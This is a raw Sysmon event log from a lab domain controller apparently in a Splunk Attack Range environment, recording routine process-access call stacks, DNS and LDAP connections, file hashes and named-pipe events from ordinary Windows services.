12:02:27.334{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+3844|C:\Windows\SYSTEM32\psmserviceexthost.dll+146dc|C:\Windows\SYSTEM32\psmserviceexthost.dll+f903|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.334{266CAFBE-64C4-6064-9C00-00000000AE01}46202908C:\Windows\system32\sihost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+47ca8|C:\Windows\System32\modernexecserver.dll+47c41|C:\Windows\System32\modernexecserver.dll+19c8a|C:\Windows\System32\modernexecserver.dll+1f6f8|C:\Windows\SYSTEM32\twinapi.appcore.dll+32a67|C:\Windows\SYSTEM32\twinapi.appcore.dll+32870|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.318{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000006230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.318{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000006229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.998{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65019- 354300x80000000000000006228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.997{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57143- 354300x80000000000000006227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.996{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53582-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 
354300x80000000000000006226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.996{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53582-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x80000000000000006225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.147{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Notifications\WPNPRMRY.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.131{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.131{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.084{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=355C6F216BC54A77A2A4FE72407DF730,SHA256=90E927953C8AEEAFA56EE0206A6A41A8265CC94D740AF5799C6AA2EF4F170AF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.069{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7DA4BCA9C5A66EF83D9DF9C03420209B,SHA256=D8134EBDDC65F31B42CCA335F4BA74F4BFC97D38985360D5BCD7AB811D137851,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.985{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.985{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.969{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000006441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.954{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f967|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.954{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+3844|C:\Windows\SYSTEM32\psmserviceexthost.dll+146dc|C:\Windows\SYSTEM32\psmserviceexthost.dll+f903|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.954{266CAFBE-64C4-6064-9C00-00000000AE01}46201988C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+47ca8|C:\Windows\System32\modernexecserver.dll+47c41|C:\Windows\System32\modernexecserver.dll+19c8a|C:\Windows\System32\modernexecserver.dll+1f6f8|C:\Windows\SYSTEM32\twinapi.appcore.dll+32a67|C:\Windows\SYSTEM32\twinapi.appcore.dll+32870|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.954{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000006437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.954{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.860{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D85863617F0AEB4EADC36E7EA8BCB55,SHA256=2E5755AF8AB4EDE92B8F18C02AFF465962AC843DD82897F4C37F66215C110573,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.782{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.782{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.782{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.782{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000006431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 
12:02:28.782{266CAFBE-64D3-6064-B600-00000000AE01}5544\TDLN-5544-41C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe 17141700x80000000000000006430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:02:28.782{266CAFBE-647D-6064-3300-00000000AE01}2520\TDLN-5544-41C:\Windows\system32\svchost.exe 10341000x80000000000000006429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.782{266CAFBE-647D-6064-3300-00000000AE01}25205160C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.782{266CAFBE-647D-6064-3300-00000000AE01}25205160C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000006427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
